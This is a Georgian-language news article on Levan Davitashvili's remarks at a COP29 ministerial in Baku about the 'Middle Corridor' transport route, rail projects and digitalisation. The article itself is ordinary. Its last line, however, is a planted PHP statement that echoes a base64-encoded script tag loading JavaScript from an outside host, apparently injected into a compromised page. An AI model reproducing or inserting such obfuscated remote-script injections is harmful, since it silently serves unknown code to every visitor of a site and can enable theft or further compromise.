celsiusi
ავერსი საქკაბელი

საქართველო, ზოგადად, აღმოსავლეთ-დასავლეთის ერთ-ერთი განუყოფელი ნაწილი და უმნიშვნელოვანესი მაკავშირებელია - ამ შემთხვევაში ევროპისა და აზიის კავშირის უმთავრესი შემადგენელი ნაწილია. აქედან გამომდინარე, „შუა დერეფნის“ ქვეყნებთან ერთად მაღალ დონეზე კოორდინაცია ძალიან მნიშვნელოვანია, - ამის შესახებ პირველმა ვიცე-პრემიერმა, ეკონომიკისა და მდგრადი განვითარების მინისტრმა, ლევან დავითაშვილმა განაცხადა.

უწყების პრესსამსახურის ინფორმაციით, მინისტრმა დღეს, აზერბაიჯანის დედაქალაქში გამართულ მინისტერიალში „მდგრადი და ციფრული განვითარება შუა დერეფანსა და მის გარეთ“ მიიღო მონაწილეობა, სადაც ერთ-ერთი მთავარი სპიკერი იყო.

მათივე ცნობით, მინისტერიალი გაეროს კლიმატის ცვლილების 29-ე კონფერენციის (COP29) ფარგლებში გაიმართა. მრგვალი მაგიდის ფორმატში „შუა დერეფნის“ მარშრუტის მონაწილე და ევროკავშირის ქვეყნების, ასევე საერთაშორისო ორგანიზაციების წარმომადგენლებმა კლიმატზე ტრანსპორტის და ლოგისტიკის სფეროს ზემოქმედების, ასევე „შუა დერეფნის“ განვითარების პერსპექტივებზე, მისი გაციფროვნების და უფრო მდგრად ოპერაციულ სისტემად გარდაქმნის საკითხებზე იმსჯელეს.

ლევან დავითაშვილის შეფასებით, ამ პროცესში საქართველოს მონაწილეობას ძალიან დიდი, მნიშვნელოვანი როლი აქვს.

„ჩვენ გვქონდა საინტერესო დისკუსია ყაზახეთის, უზბეკეთის, თურქმენეთის, ყირგიზეთის, აზერბაიჯანის, რუმინეთის, თურქეთის და სხვა ქვეყნების წარმომადგენლებთან, რომლებიც „შუა დერეფნის“ განვითარებაში ძალიან მნიშვნელოვან როლს ასრულებენ. ასევე, ვისაუბრეთ „შუა დერეფნის“ შემდგომი განვითარების ხუთწლიან გეგმაზე. ვისაუბრეთ იმ მიღწევებზეც, რომელიც ბოლო პერიოდში „შუა დერეფნის“ კუთხით ჩვენ ტრანსპორტის და ლოგისტიკის სფეროში გვაქვს; იმ ზრდაზე, რომელიც 2022 და დამატებით, 2023 წლებში განსაკუთრებით შთამბეჭდავი იყო. ასევე, იმ მნიშვნელოვან რეფორმებსა და პროექტებზე, რომლებიც საქართველოში ხორციელდება და „შუა დერეფნის“ კონკურენტუნარიანობის ამაღლებისთვის ერთ-ერთი მნიშვნელოვანი მომენტია“, - განაცხადა პირველმა ვიცე-პრემიერმა.

დავითაშვილმა მინისტერიალზე გამოსვლისას აქცენტი გააკეთა საქართველოში მიმდინარე ისეთ მნიშვნელოვან სარკინიგზო პროექტებზე, როგორიცაა არსებული რკინიგზის მოდერნიზაციის პროექტი და ბაქო-თბილისი-ყარსის ახალი რკინიგზის პროექტი, რომელიც დასრულებით ეტაპზეა.

მისი განცხადებით, ასევე საუბარი შეეხო აღმოსავლეთ-დასავლეთის დამაკავშირებელ ჩქაროსნულ მაგისტრალსა და გაციფროვნების ოპერაციებს, მათ შორის ყურადღება გამახვილდა ისეთ ინიციატივებზე, რომლებიც უფრო მდგრადი და კლიმატ-გონივრული იქნება“, - ნათქვამია სამინისტროს მიერ გავრცელებულ ინფორმაციაში.

57
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");